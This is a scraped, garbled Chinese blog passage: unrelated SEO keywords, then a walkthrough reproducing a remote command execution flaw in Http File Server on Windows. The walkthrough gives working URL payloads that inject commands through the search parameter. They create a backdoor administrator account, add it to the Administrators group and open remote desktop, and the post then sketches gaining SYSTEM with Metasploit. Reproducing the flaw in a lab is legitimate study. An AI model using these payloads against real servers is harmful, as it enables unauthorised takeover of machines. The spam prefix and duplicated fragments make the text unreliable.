淮南网站建设 飞沐,室内设计平面布置图,企业宣传片制作公司排名,入门 做网站 书籍漏洞程序下载地址:Http File Server 这里说一下#xff0c;在Windows server 2003中复现时#xff0c;我直接使用Administrator用户登录#xff0c;然后复现#xff0c;未出现权限问题。再Windows 10中尝试复现时发现权限不足#xff0c;需要以管理员权限执行漏洞程序。 运… 漏洞程序下载地址:Http File Server 这里说一下在Windows server 2003中复现时我直接使用Administrator用户登录然后复现未出现权限问题。再Windows 10中尝试复现时发现权限不足需要以管理员权限执行漏洞程序。 运行程序截图如下 尝试访问该软件提供的web服务 web服务是这个样子的这个web服务的搜索处存在漏洞 一、手工利用 payload如下 http://127.0.0.1/?search%00{.exec|cmd /c 此处替换为dos命令.}
http://127.0.0.1/?search%00{.exec|cmd /c 此处替换为dos命令.}
12 完整利用过程如下 使用如下payload添加一个管理员账户 http://127.0.0.1/?search%00{.exec|cmd /c net user hack 123 /add.}
1 添加用户hack 密码123 将用户hack添加到Administrators组。 http://127.0.0.1/?search%00{.exec|cmd /c net localgroup Administrators hack /add.}
1 开启3389远程端口 使用远程连接工具连接连接成功。 2、使用msf利用 启动Metasploit搜索hfs漏洞利用模块 加载模块并设置目标IP 设置payload以及本机IP 开始执行 成功获得system权限
